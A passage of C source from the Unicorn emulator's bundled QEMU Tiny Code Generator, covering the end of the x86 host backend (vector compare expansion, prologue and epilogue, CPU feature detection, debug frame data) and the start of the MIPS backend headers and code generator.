NEED_UMAX | NEED_INV; } else { fixup = NEED_BIAS | NEED_SWAP; } break; default: g_assert_not_reached(); } if (fixup & NEED_INV) { cond = tcg_invert_cond(cond); } if (fixup & NEED_SWAP) { t1 = v1, v1 = v2, v2 = t1; cond = tcg_swap_cond(cond); } t1 = t2 = NULL; if (fixup & (NEED_UMIN | NEED_UMAX)) { t1 = tcg_temp_new_vec(tcg_ctx, type); if (fixup & NEED_UMIN) { tcg_gen_umin_vec(tcg_ctx, vece, t1, v1, v2); } else { tcg_gen_umax_vec(tcg_ctx, vece, t1, v1, v2); } v2 = t1; cond = TCG_COND_EQ; } else if (fixup & NEED_BIAS) { t1 = tcg_temp_new_vec(tcg_ctx, type); t2 = tcg_temp_new_vec(tcg_ctx, type); tcg_gen_dupi_vec(tcg_ctx, vece, t2, 
1ull << ((8 << vece) - 1)); tcg_gen_sub_vec(tcg_ctx, vece, t1, v1, t2); tcg_gen_sub_vec(tcg_ctx, vece, t2, v2, t2); v1 = t1; v2 = t2; cond = tcg_signed_cond(cond); } tcg_debug_assert(cond == TCG_COND_EQ || cond == TCG_COND_GT); /* Expand directly; do not recurse. */ vec_gen_4(tcg_ctx, INDEX_op_cmp_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v1), tcgv_vec_arg(tcg_ctx, v2), cond); if (t1) { tcg_temp_free_vec(tcg_ctx, t1); if (t2) { tcg_temp_free_vec(tcg_ctx, t2); } } return fixup & NEED_INV; } static void expand_vec_cmp(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec v1, TCGv_vec v2, TCGCond cond) { if (expand_vec_cmp_noinv(tcg_ctx, type, vece, v0, v1, v2, cond)) { tcg_gen_not_vec(tcg_ctx, vece, v0, v0); } } static void expand_vec_cmpsel(TCGContext *tcg_ctx, TCGType type, unsigned vece, TCGv_vec v0, TCGv_vec c1, TCGv_vec c2, TCGv_vec v3, TCGv_vec v4, TCGCond cond) { TCGv_vec t = tcg_temp_new_vec(tcg_ctx, type); if (expand_vec_cmp_noinv(tcg_ctx, type, vece, t, c1, c2, cond)) { /* Invert the sense of the compare by swapping arguments. */ TCGv_vec x; x = v3, v3 = v4, v4 = x; } vec_gen_4(tcg_ctx, INDEX_op_x86_vpblendvb_vec, type, vece, tcgv_vec_arg(tcg_ctx, v0), tcgv_vec_arg(tcg_ctx, v4), tcgv_vec_arg(tcg_ctx, v3), tcgv_vec_arg(tcg_ctx, t)); tcg_temp_free_vec(tcg_ctx, t); } void tcg_expand_vec_op(TCGContext *tcg_ctx, TCGOpcode opc, TCGType type, unsigned vece, TCGArg a0, ...) { va_list va; TCGArg a2; TCGv_vec v0, v1, v2, v3, v4; va_start(va, a0); v0 = temp_tcgv_vec(tcg_ctx, arg_temp(a0)); v1 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); a2 = va_arg(va, TCGArg); switch (opc) { case INDEX_op_shli_vec: case INDEX_op_shri_vec: expand_vec_shi(tcg_ctx, type, vece, opc == INDEX_op_shri_vec, v0, v1, a2); break; case INDEX_op_sari_vec: expand_vec_sari(tcg_ctx, type, vece, v0, v1, a2); break; case INDEX_op_mul_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_mul(tcg_ctx, type, vece, v0, v1, v2); break; case INDEX_op_cmp_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); expand_vec_cmp(tcg_ctx, type, vece, v0, v1, v2, va_arg(va, TCGArg)); break; case INDEX_op_cmpsel_vec: v2 = temp_tcgv_vec(tcg_ctx, arg_temp(a2)); v3 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); v4 = temp_tcgv_vec(tcg_ctx, arg_temp(va_arg(va, TCGArg))); expand_vec_cmpsel(tcg_ctx, type, vece, v0, v1, v2, v3, v4, va_arg(va, TCGArg)); break; default: break; } va_end(va); } static const int tcg_target_callee_save_regs[] = { #if TCG_TARGET_REG_BITS == 64 TCG_REG_RBP, TCG_REG_RBX, #if defined(_WIN64) TCG_REG_RDI, TCG_REG_RSI, #endif TCG_REG_R12, TCG_REG_R13, TCG_REG_R14, /* Currently used for the global env. */ TCG_REG_R15, #else TCG_REG_EBP, /* Currently used for the global env. */ TCG_REG_EBX, TCG_REG_ESI, TCG_REG_EDI, #endif }; /* Compute frame size via macros, to share between tcg_target_qemu_prologue and tcg_register_jit. */ #define PUSH_SIZE \ ((1 + ARRAY_SIZE(tcg_target_callee_save_regs)) \ * (TCG_TARGET_REG_BITS / 8)) #define FRAME_SIZE \ ((PUSH_SIZE \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long) \ + TCG_TARGET_STACK_ALIGN - 1) \ & ~(TCG_TARGET_STACK_ALIGN - 1)) /* Generate global QEMU prologue and epilogue code */ static void tcg_target_qemu_prologue(TCGContext *s) { int i, stack_addend; /* TB prologue */ /* Reserve some stack space, also for TCG temps. */ stack_addend = FRAME_SIZE - PUSH_SIZE; tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE, CPU_TEMP_BUF_NLONGS * sizeof(long)); /* Save all callee saved registers. 
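       The frame laid out here is PUSH_SIZE bytes of pushed registers
       plus the stack_addend computed above, which covers the static
       call args area and the TCG temp buffer and keeps the total
       FRAME_SIZE aligned to TCG_TARGET_STACK_ALIGN.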
*/ for (i = 0; i < ARRAY_SIZE(tcg_target_callee_save_regs); i++) { tcg_out_push(s, tcg_target_callee_save_regs[i]); } #if TCG_TARGET_REG_BITS == 32 tcg_out_ld(s, TCG_TYPE_PTR, TCG_AREG0, TCG_REG_ESP, (ARRAY_SIZE(tcg_target_callee_save_regs) + 1) * 4); tcg_out_addi(s, TCG_REG_ESP, -stack_addend); /* jmp *tb. */ tcg_out_modrm_offset(s, OPC_GRP5, EXT5_JMPN_Ev, TCG_REG_ESP, (ARRAY_SIZE(tcg_target_callee_save_regs) + 2) * 4 + stack_addend); #else tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); tcg_out_addi(s, TCG_REG_ESP, -stack_addend); /* jmp *tb. */ tcg_out_modrm(s, OPC_GRP5, EXT5_JMPN_Ev, tcg_target_call_iarg_regs[1]); #endif /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_REG, TCG_REG_EAX, 0); /* TB epilogue */ s->tb_ret_addr = s->code_ptr; tcg_out_addi(s, TCG_REG_CALL_STACK, stack_addend); if (have_avx2) { tcg_out_vex_opc(s, OPC_VZEROUPPER, 0, 0, 0, 0); } for (i = ARRAY_SIZE(tcg_target_callee_save_regs) - 1; i >= 0; i--) { tcg_out_pop(s, tcg_target_callee_save_regs[i]); } tcg_out_opc(s, OPC_RET, 0, 0, 0); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { memset(p, 0x90, count); } static void tcg_target_init(TCGContext *s) { #ifdef CONFIG_CPUID_H unsigned a, b, c, d, b7 = 0; int max; #ifdef _MSC_VER int cpu_info[4]; __cpuid(cpu_info, 0); max = cpu_info[0]; #else max = __get_cpuid_max(0, 0); #endif if (max >= 7) { /* BMI1 is available on AMD Piledriver and Intel Haswell CPUs. */ #ifdef _MSC_VER __cpuid(cpu_info, 7); a = cpu_info[0]; b7 = cpu_info[1]; c = cpu_info[2]; d = cpu_info[3]; #else __cpuid_count(7, 0, a, b7, c, d); #endif have_bmi1 = (b7 & bit_BMI) != 0; have_bmi2 = (b7 & bit_BMI2) != 0; } if (max >= 1) { #ifdef _MSC_VER __cpuid(cpu_info, 1); a = cpu_info[0]; b = cpu_info[1]; c = cpu_info[2]; d = cpu_info[3]; #else __cpuid(1, a, b, c, d); #endif #ifndef have_cmov /* For 32-bit, 99% certainty that we're running on hardware that supports cmov, but we still need to check. In case cmov is not available, we'll use a small forward branch. */ have_cmov = (d & bit_CMOV) != 0; #endif /* MOVBE is only available on Intel Atom and Haswell CPUs, so we need to probe for it. */ have_movbe = (c & bit_MOVBE) != 0; have_popcnt = (c & bit_POPCNT) != 0; /* There are a number of things we must check before we can be sure of not hitting invalid opcode. */ if (c & bit_OSXSAVE) { unsigned xcrl, xcrh; /* The xgetbv instruction is not available to older versions of * the assembler, so we encode the instruction manually. */ #ifndef _MSC_VER asm(".byte 0x0f, 0x01, 0xd0" : "=a" (xcrl), "=d" (xcrh) : "c" (0)); #else unsigned long long bv = _xgetbv(0); xcrl = bv & 0xFFFFFFFF; xcrh = (bv >> 32) & 0xFFFFFFFF; #endif if ((xcrl & 6) == 6) { have_avx1 = (c & bit_AVX) != 0; have_avx2 = (b7 & bit_AVX2) != 0; } } } #ifdef _MSC_VER __cpuid(cpu_info, 0x80000000); max = cpu_info[0]; #else max = __get_cpuid_max(0x8000000, 0); #endif if (max >= 1) { #ifdef _MSC_VER __cpuid(cpu_info, 0x80000001); a = cpu_info[0]; b = cpu_info[1]; c = cpu_info[2]; d = cpu_info[3]; #else __cpuid(0x80000001, a, b, c, d); #endif /* LZCNT was introduced with AMD Barcelona and Intel Haswell CPUs. 
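       The bit is reported in ECX of CPUID leaf 0x80000001 (AMD's ABM
       feature); on CPUs without it the LZCNT encoding silently decodes
       as BSR, so we must probe rather than emit it unconditionally.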
*/ have_lzcnt = (c & bit_LZCNT) != 0; } #endif /* CONFIG_CPUID_H */ s->tcg_target_available_regs[TCG_TYPE_I32] = ALL_GENERAL_REGS; if (TCG_TARGET_REG_BITS == 64) { s->tcg_target_available_regs[TCG_TYPE_I64] = ALL_GENERAL_REGS; } if (have_avx1) { s->tcg_target_available_regs[TCG_TYPE_V64] = ALL_VECTOR_REGS; s->tcg_target_available_regs[TCG_TYPE_V128] = ALL_VECTOR_REGS; } if (have_avx2) { s->tcg_target_available_regs[TCG_TYPE_V256] = ALL_VECTOR_REGS; } s->tcg_target_call_clobber_regs = ALL_VECTOR_REGS; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EAX); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_EDX); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_ECX); if (TCG_TARGET_REG_BITS == 64) { #if !defined(_WIN64) tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RDI); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_RSI); #endif tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R8); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R9); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R10); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R11); } s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[14]; } DebugFrame; /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); #if !defined(__ELF__) /* Host machine without ELF. */ #elif TCG_TARGET_REG_BITS == 64 #define ELF_HOST_MACHINE EM_X86_64 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x78, /* sleb128 -8 */ .h.cie.return_column = 16, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, 7, /* DW_CFA_def_cfa %rsp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x90, 1, /* DW_CFA_offset, %rip, -8 */ /* The following ordering must match tcg_target_callee_save_regs. */ 0x86, 2, /* DW_CFA_offset, %rbp, -16 */ 0x83, 3, /* DW_CFA_offset, %rbx, -24 */ 0x8c, 4, /* DW_CFA_offset, %r12, -32 */ 0x8d, 5, /* DW_CFA_offset, %r13, -40 */ 0x8e, 6, /* DW_CFA_offset, %r14, -48 */ 0x8f, 7, /* DW_CFA_offset, %r15, -56 */ } }; #else #define ELF_HOST_MACHINE EM_386 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 0x7c, /* sleb128 -4 */ .h.cie.return_column = 8, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, 4, /* DW_CFA_def_cfa %esp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x88, 1, /* DW_CFA_offset, %eip, -4 */ /* The following ordering must match tcg_target_callee_save_regs. 
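       Each pair below is DW_CFA_offset: (0x80 | dwarf register number)
       followed by the save-slot offset divided by the data alignment
       factor (-4 here).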
*/ 0x85, 2, /* DW_CFA_offset, %ebp, -8 */ 0x83, 3, /* DW_CFA_offset, %ebx, -12 */ 0x86, 4, /* DW_CFA_offset, %esi, -16 */ 0x87, 5, /* DW_CFA_offset, %edi, -20 */ } }; #endif #if defined(ELF_HOST_MACHINE) void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } #endif
unicorn-2.1.1/qemu/tcg/i386/tcg-target.opc.h
/* * Copyright (c) 2019 Linaro * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. * * Target-specific opcodes for host vector expansion. These will be * emitted by tcg_expand_vec_op. For those familiar with GCC internals, * consider these to be UNSPEC with names.
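 * As with the entries in tcg-opc.h, each DEF(name, nb_oargs, nb_iargs,
 * nb_cargs, flags) line below declares one opcode together with its
 * output, input and constant operand counts; IMPLVEC flags it as part
 * of the target's vector implementation.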
*/ DEF(x86_shufps_vec, 1, 2, 1, IMPLVEC) DEF(x86_vpblendvb_vec, 1, 3, 0, IMPLVEC) DEF(x86_blend_vec, 1, 2, 1, IMPLVEC) DEF(x86_packss_vec, 1, 2, 0, IMPLVEC) DEF(x86_packus_vec, 1, 2, 0, IMPLVEC) DEF(x86_psrldq_vec, 1, 1, 1, IMPLVEC) DEF(x86_vperm2i128_vec, 1, 2, 1, IMPLVEC) DEF(x86_punpckl_vec, 1, 2, 0, IMPLVEC) DEF(x86_punpckh_vec, 1, 2, 0, IMPLVEC)
unicorn-2.1.1/qemu/tcg/mips/tcg-target.h
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008-2009 Arnaud Patard <arnaud.patard@rtp-net.org> * Copyright (c) 2009 Aurelien Jarno <aurelien@aurel32.net> * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE.
*/ #ifndef MIPS_TCG_TARGET_H #define MIPS_TCG_TARGET_H #if _MIPS_SIM == _ABIO32 # define TCG_TARGET_REG_BITS 32 #elif _MIPS_SIM == _ABIN32 || _MIPS_SIM == _ABI64 # define TCG_TARGET_REG_BITS 64 #else # error "Unknown ABI" #endif #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 16 #define TCG_TARGET_NB_REGS 32 typedef enum { TCG_REG_ZERO = 0, TCG_REG_AT, TCG_REG_V0, TCG_REG_V1, TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_T3, TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, TCG_REG_T7, TCG_REG_S0, TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_T8, TCG_REG_T9, TCG_REG_K0, TCG_REG_K1, TCG_REG_GP, TCG_REG_SP, TCG_REG_S8, TCG_REG_RA, TCG_REG_CALL_STACK = TCG_REG_SP, TCG_AREG0 = TCG_REG_S0, } TCGReg; /* used for function call generation */ #define TCG_TARGET_STACK_ALIGN 16 #if _MIPS_SIM == _ABIO32 # define TCG_TARGET_CALL_STACK_OFFSET 16 #else # define TCG_TARGET_CALL_STACK_OFFSET 0 #endif #define TCG_TARGET_CALL_ALIGN_ARGS 1 /* MOVN/MOVZ instructions detection */ #if (defined(__mips_isa_rev) && (__mips_isa_rev >= 1)) || \ defined(_MIPS_ARCH_LOONGSON2E) || defined(_MIPS_ARCH_LOONGSON2F) || \ defined(_MIPS_ARCH_MIPS4) #define use_movnz_instructions 1 #else extern bool use_movnz_instructions; #endif /* MIPS32 instruction set detection */ #if defined(__mips_isa_rev) && (__mips_isa_rev >= 1) #define use_mips32_instructions 1 #else extern bool use_mips32_instructions; #endif /* MIPS32R2 instruction set detection */ #if defined(__mips_isa_rev) && (__mips_isa_rev >= 2) #define use_mips32r2_instructions 1 #else extern bool use_mips32r2_instructions; #endif /* MIPS32R6 instruction set detection */ #if defined(__mips_isa_rev) && (__mips_isa_rev >= 6) #define use_mips32r6_instructions 1 #else #define use_mips32r6_instructions 0 #endif /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_nor_i32 1 #define TCG_TARGET_HAS_andc_i32 0 #define TCG_TARGET_HAS_orc_i32 0 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_mulu2_i32 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muls2_i32 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muluh_i32 1 #define TCG_TARGET_HAS_mulsh_i32 1 #define TCG_TARGET_HAS_bswap32_i32 1 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_add2_i32 0 #define TCG_TARGET_HAS_sub2_i32 0 #define TCG_TARGET_HAS_extrl_i64_i32 1 #define TCG_TARGET_HAS_extrh_i64_i32 1 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_nor_i64 1 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_add2_i64 0 #define TCG_TARGET_HAS_sub2_i64 0 #define TCG_TARGET_HAS_mulu2_i64 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muls2_i64 (!use_mips32r6_instructions) #define TCG_TARGET_HAS_muluh_i64 1 #define TCG_TARGET_HAS_mulsh_i64 1 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext32u_i64 1 #endif /* optional instructions detected at runtime */ #define TCG_TARGET_HAS_movcond_i32 use_movnz_instructions #define TCG_TARGET_HAS_bswap16_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_deposit_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_extract_i32 use_mips32r2_instructions #define 
TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_ext8s_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_ext16s_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_rot_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_clz_i32 use_mips32r2_instructions #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_movcond_i64 use_movnz_instructions #define TCG_TARGET_HAS_bswap16_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_bswap32_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_bswap64_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_deposit_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_extract_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_ext8s_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_ext16s_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_rot_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_clz_i64 use_mips32r2_instructions #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #endif /* optional instructions automatically implemented */ #define TCG_TARGET_HAS_neg_i32 0 /* sub rd, zero, rt */ #define TCG_TARGET_HAS_ext8u_i32 0 /* andi rt, rs, 0xff */ #define TCG_TARGET_HAS_ext16u_i32 0 /* andi rt, rs, 0xffff */ #if TCG_TARGET_REG_BITS == 64 #define TCG_TARGET_HAS_neg_i64 0 /* sub rd, zero, rt */ #define TCG_TARGET_HAS_ext8u_i64 0 /* andi rt, rs, 0xff */ #define TCG_TARGET_HAS_ext16u_i64 0 /* andi rt, rs, 0xffff */ #endif #ifdef __OpenBSD__ #include <machine/sysarch.h> #else #include <sys/cachectl.h> #endif #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { cacheflush ((void *)start, stop-start, ICACHE); } void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #ifdef CONFIG_SOFTMMU #define TCG_TARGET_NEED_LDST_LABELS #endif #endif
unicorn-2.1.1/qemu/tcg/mips/tcg-target.inc.c
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008-2009 Arnaud Patard <arnaud.patard@rtp-net.org> * Copyright (c) 2009 Aurelien Jarno <aurelien@aurel32.net> * Based on i386/tcg-target.c - Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software.
* * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifdef HOST_WORDS_BIGENDIAN # define MIPS_BE 1 #else # define MIPS_BE 0 #endif #if TCG_TARGET_REG_BITS == 32 # define LO_OFF (MIPS_BE * 4) # define HI_OFF (4 - LO_OFF) #else /* To assert at compile-time that these values are never used for TCG_TARGET_REG_BITS == 64. */ int link_error(void); # define LO_OFF link_error() # define HI_OFF link_error() #endif #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "zero", "at", "v0", "v1", "a0", "a1", "a2", "a3", "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", "s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7", "t8", "t9", "k0", "k1", "gp", "sp", "s8", "ra", }; #endif #define TCG_TMP0 TCG_REG_AT #define TCG_TMP1 TCG_REG_T9 #define TCG_TMP2 TCG_REG_T8 #define TCG_TMP3 TCG_REG_T7 #ifndef CONFIG_SOFTMMU #define TCG_GUEST_BASE_REG TCG_REG_S1 #endif /* check if we really need so many registers :P */ static const int tcg_target_reg_alloc_order[] = { /* Call saved registers. */ TCG_REG_S0, TCG_REG_S1, TCG_REG_S2, TCG_REG_S3, TCG_REG_S4, TCG_REG_S5, TCG_REG_S6, TCG_REG_S7, TCG_REG_S8, /* Call clobbered registers. */ TCG_REG_T4, TCG_REG_T5, TCG_REG_T6, TCG_REG_T7, TCG_REG_T8, TCG_REG_T9, TCG_REG_V1, TCG_REG_V0, /* Argument registers, opposite order of allocation. */ TCG_REG_T3, TCG_REG_T2, TCG_REG_T1, TCG_REG_T0, TCG_REG_A3, TCG_REG_A2, TCG_REG_A1, TCG_REG_A0, }; static const TCGReg tcg_target_call_iarg_regs[] = { TCG_REG_A0, TCG_REG_A1, TCG_REG_A2, TCG_REG_A3, #if _MIPS_SIM == _ABIN32 || _MIPS_SIM == _ABI64 TCG_REG_T0, TCG_REG_T1, TCG_REG_T2, TCG_REG_T3, #endif }; static const TCGReg tcg_target_call_oarg_regs[2] = { TCG_REG_V0, TCG_REG_V1 }; static tcg_insn_unit *tb_ret_addr; static tcg_insn_unit *bswap32_addr; static tcg_insn_unit *bswap32u_addr; static tcg_insn_unit *bswap64_addr; static inline uint32_t reloc_pc16_val(tcg_insn_unit *pc, tcg_insn_unit *target) { /* Let the compiler perform the right-shift as part of the arithmetic. */ ptrdiff_t disp = target - (pc + 1); tcg_debug_assert(disp == (int16_t)disp); return disp & 0xffff; } static inline void reloc_pc16(tcg_insn_unit *pc, tcg_insn_unit *target) { *pc = deposit32(*pc, 0, 16, reloc_pc16_val(pc, target)); } static inline uint32_t reloc_26_val(tcg_insn_unit *pc, tcg_insn_unit *target) { tcg_debug_assert((((uintptr_t)pc ^ (uintptr_t)target) & 0xf0000000) == 0); return ((uintptr_t)target >> 2) & 0x3ffffff; } static inline void reloc_26(tcg_insn_unit *pc, tcg_insn_unit *target) { *pc = deposit32(*pc, 0, 26, reloc_26_val(pc, target)); } static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_debug_assert(type == R_MIPS_PC16); tcg_debug_assert(addend == 0); reloc_pc16(code_ptr, (tcg_insn_unit *)value); return true; } #define TCG_CT_CONST_ZERO 0x100 #define TCG_CT_CONST_U16 0x200 /* Unsigned 16-bit: 0 - 0xffff. */ #define TCG_CT_CONST_S16 0x400 /* Signed 16-bit: -32768 - 32767 */ #define TCG_CT_CONST_P2M1 0x800 /* Power of 2 minus 1. 
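                                        (masks such as 0xff or 0x3fff,
                                        so an AND against them can be
                                        emitted as a mips32r2 EXT
                                        bitfield extract)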
*/ #define TCG_CT_CONST_N16 0x1000 /* "Negatable" 16-bit: -32767 - 32767 */ #define TCG_CT_CONST_WSZ 0x2000 /* word size */ static inline bool is_p2m1(tcg_target_long val) { return val && ((val + 1) & val) == 0; } /* parse target specific constraints */ static const char *target_parse_constraint(TCGArgConstraint *ct, const char *ct_str, TCGType type) { switch(*ct_str++) { case 'r': ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; break; case 'L': /* qemu_ld input arg constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); #if defined(CONFIG_SOFTMMU) if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); } #endif break; case 'S': /* qemu_st constraint */ ct->ct |= TCG_CT_REG; ct->u.regs = 0xffffffff; tcg_regset_reset_reg(ct->u.regs, TCG_REG_A0); #if defined(CONFIG_SOFTMMU) if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_regset_reset_reg(ct->u.regs, TCG_REG_A2); 